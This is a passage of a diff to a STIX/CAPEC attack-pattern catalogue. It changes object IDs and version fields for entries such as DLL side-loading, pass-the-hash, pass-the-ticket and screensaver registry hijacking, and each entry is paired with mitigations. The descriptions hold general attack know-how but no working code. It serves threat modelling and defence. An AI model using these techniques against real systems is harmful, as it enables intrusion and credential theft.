"course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { "name": "DLL Side-Loading", "description": "An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -39297,116 +39983,117 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--8e94d208-da9f-4b67-8d0a-9335c66423c5" + "id": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-641-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Prevent unknown DLLs from loading through whitelisting policy.", "type": "course-of-action", - "id": "course-of-action--aab70baf-d803-4664-a98d-d5dcef0b1d82" + "id": "course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--393b393d-9ff9-4d1f-9677-d2383bb609a9", - "source_ref": "course-of-action--aab70baf-d803-4664-a98d-d5dcef0b1d82", + "id": "relationship--811e822f-16cf-4141-af34-ece4c8f64959", + "source_ref": "course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8e94d208-da9f-4b67-8d0a-9335c66423c5" + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--fe4fe507-a35c-4736-96de-24e26943694d", - "source_ref": "course-of-action--d7b68a77-124d-4ddd-8e29-e185387ec071", + "id": "relationship--70558577-9185-4fbc-9786-d7f780a06eb8", + "source_ref": "course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8e94d208-da9f-4b67-8d0a-9335c66423c5" + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dcdf7096-a157-4f9b-a1e8-d570b1abf020", - "source_ref": "course-of-action--e8aa8560-dc40-4013-9a37-1bf668fa521c", + "id": "relationship--ec9fd5bc-7801-4acd-bcd5-18947ec8d217", + "source_ref": "course-of-action--4f26db10-8931-420a-9894-08ba87d842af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8e94d208-da9f-4b67-8d0a-9335c66423c5" + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-641-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use of sxstrace.exe on Windows as well as manual inspection of the manifests.", "type": "course-of-action", - "id": "course-of-action--380c5528-6237-49d1-bffd-b9ed946b1849" + "id": "course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5a4722fe-9ea0-4000-8211-7fd17afc4909", - "source_ref": "course-of-action--380c5528-6237-49d1-bffd-b9ed946b1849", + "id": "relationship--07ca287a-78fb-473c-a87f-00cf46c5954c", + "source_ref": "course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8e94d208-da9f-4b67-8d0a-9335c66423c5" + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-641-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Require code signing and avoid using relative paths for resources.", "type": "course-of-action", - "id": "course-of-action--c6018e84-eade-499a-bcf4-a76890225fc4" + "id": "course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--366ea54d-9a24-47b2-91ac-2dd95248ed6c", - "source_ref": "course-of-action--c6018e84-eade-499a-bcf4-a76890225fc4", + "id": "relationship--0b652a5c-281d-4140-90be-a1a5414312c5", + "source_ref": "course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8e94d208-da9f-4b67-8d0a-9335c66423c5" + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb" }, { "name": "Replace Binaries", "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -39432,40 +40119,41 @@ "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--38b19f2b-a2ea-4ea7-b72d-1ad2efe846ad" + "id": "attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-642-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services.", "type": "course-of-action", - "id": "course-of-action--84cb3412-c4db-4e81-bcf9-daaabd27ac63" + "id": "course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--986ba3fb-e0ac-45c5-a724-2fd19cde9572", - "source_ref": "course-of-action--84cb3412-c4db-4e81-bcf9-daaabd27ac63", + "id": "relationship--1f30afb7-1953-45f8-975c-dc920f73d473", + "source_ref": "course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580", "relationship_type": "mitigates", - "target_ref": "attack-pattern--38b19f2b-a2ea-4ea7-b72d-1ad2efe846ad" + "target_ref": "attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12" }, { "name": "Identify Shared Files/Directories on System", "description": "An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -39504,40 +40192,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--bba5bd27-3d6b-47d3-8128-33a1be156474" + "id": "attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-643-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using whitelisting tools.", "type": "course-of-action", - "id": "course-of-action--12a35fd6-c79c-4516-a13f-487f80acd542" + "id": "course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4215b2e5-bf71-43d1-bc3e-dac324d5c9b5", - "source_ref": "course-of-action--12a35fd6-c79c-4516-a13f-487f80acd542", + "id": "relationship--ad5a9c4f-dec3-41d6-b5af-dec89b0bf143", + "source_ref": "course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bba5bd27-3d6b-47d3-8128-33a1be156474" + "target_ref": "attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82" }, { "name": "Use of Captured Hashes (Pass The Hash)", "description": "An adversary uses stolen hash values for a user's credentials (username and password) to access systems managed under the same credential framwork that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, the hashed credentials' associated plaintext credentials are not requried for successful authentication. Therefore, if an adversary can obtain the hashed credentials of a user, he can then pass these hash values to the server or service to authenticate without needing to brute-force the hashes to obtain their cleartext values. The adversary can then impersonate the user and laterally move within the network. This technique can be performed against any operating system which leverages the LM or NTLM protocols.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -39570,90 +40259,91 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4092241b-164d-4214-8a45-2f737a810746" + "id": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-644-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.", "type": "course-of-action", - "id": "course-of-action--80e5cd35-388a-46f4-bd02-aab784c61a7b" + "id": "course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--33ce14c3-a5be-4020-8e19-360e04bf3c08", - "source_ref": "course-of-action--80e5cd35-388a-46f4-bd02-aab784c61a7b", + "id": "relationship--dc8b3664-52e4-4864-ab89-3926d27aa304", + "source_ref": "course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4092241b-164d-4214-8a45-2f737a810746" + "target_ref": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-644-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor system and domain logs for abnormal credential access.", "type": "course-of-action", - "id": "course-of-action--7e1f50d0-137b-49c7-9b05-ba337a821a3c" + "id": "course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6922f7a2-3488-47ac-ae25-2abe947904e1", - "source_ref": "course-of-action--7e1f50d0-137b-49c7-9b05-ba337a821a3c", + "id": "relationship--8deebf71-a2a6-4b9f-b4da-0234b9d83b46", + "source_ref": "course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4092241b-164d-4214-8a45-2f737a810746" + "target_ref": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-644-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.", "type": "course-of-action", - "id": "course-of-action--a464a18e-276f-41d7-b6cd-f977c7abab72" + "id": "course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8f4faf29-5c5d-4514-8387-d53a53809693", - "source_ref": "course-of-action--a464a18e-276f-41d7-b6cd-f977c7abab72", + "id": "relationship--db7e558e-5af8-43b1-b4d1-5ce7a528a034", + "source_ref": "course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4092241b-164d-4214-8a45-2f737a810746" + "target_ref": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e" }, { "name": "Use of Captured Tickets (Pass The Ticket)", "description": "An adversary uses stolen Kerberos tickets to access systems that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -39686,56 +40376,57 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b79a7a78-f050-4712-b2ab-525fbcb3a31f" + "id": "attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-645-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.", "type": "course-of-action", - "id": "course-of-action--0fb18d34-1809-44f2-877b-ae9832a88b0a" + "id": "course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ddae580e-5ab0-43c1-b329-8dc046cfa041", - "source_ref": "course-of-action--0fb18d34-1809-44f2-877b-ae9832a88b0a", + "id": "relationship--08835a39-a775-4a48-91fc-9b8215778f8e", + "source_ref": "course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b79a7a78-f050-4712-b2ab-525fbcb3a31f" + "target_ref": "attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--db4124f8-fb78-4177-9687-fbf9a5f4f6cb", - "source_ref": "course-of-action--188ab2d9-02a6-428e-af99-4c75515a5503", + "id": "relationship--cf721c34-2455-49c9-87ab-611748f9729e", + "source_ref": "course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b79a7a78-f050-4712-b2ab-525fbcb3a31f" + "target_ref": "attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec" }, { "name": "Peripheral Footprinting", "description": "Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -39756,33 +40447,34 @@ "x_capec_skills_required": { "Medium": "If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices." }, - "x_capec_abstraction": "Detailed", + "x_capec_abstraction": "Standard", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--8abdb185-8e5e-4f8b-88ea-e9b18516d803" + "id": "attack-pattern--81be8f89-928c-47bc-9dff-95f503ea0e82" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--657e3e09-1191-424e-92d5-6371de2b8423", - "source_ref": "course-of-action--b4565cf5-7496-4a82-ad9d-fe0ba942a4f7", + "id": "relationship--14fbd49a-5f94-48f0-8ca6-ffef3f9c2d0e", + "source_ref": "course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8abdb185-8e5e-4f8b-88ea-e9b18516d803" + "target_ref": "attack-pattern--81be8f89-928c-47bc-9dff-95f503ea0e82" }, { "name": "Collect Data from Registries", "description": "An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -39814,44 +40506,45 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--159328bc-5455-4a2d-9e4a-ec5524eadb82" + "id": "attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--588f2c25-5567-4a69-86af-7be30d8ff4b1", - "source_ref": "course-of-action--09cebeef-1e55-445a-94b7-3029f30c7e80", + "id": "relationship--3820337c-7206-4af3-90ba-cf4815079d78", + "source_ref": "course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22", "relationship_type": "mitigates", - "target_ref": "attack-pattern--159328bc-5455-4a2d-9e4a-ec5524eadb82" + "target_ref": "attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c043ad62-908d-4e40-b401-f7534a37988e", - "source_ref": "course-of-action--b6dd58ac-a09f-41c6-9db8-bc034b7c6203", + "id": "relationship--d8bf5219-94ef-4829-bdad-7e05f03ae829", + "source_ref": "course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab", "relationship_type": "mitigates", - "target_ref": "attack-pattern--159328bc-5455-4a2d-9e4a-ec5524eadb82" + "target_ref": "attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5" }, { "name": "Collect Data from Screen Capture", "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -39882,65 +40575,66 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4bc32f7f-0af6-4d1e-93f7-af427c4593cc" + "id": "attack-pattern--8f1bcb61-cdf4-41ff-a82a-df537363a9a5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": 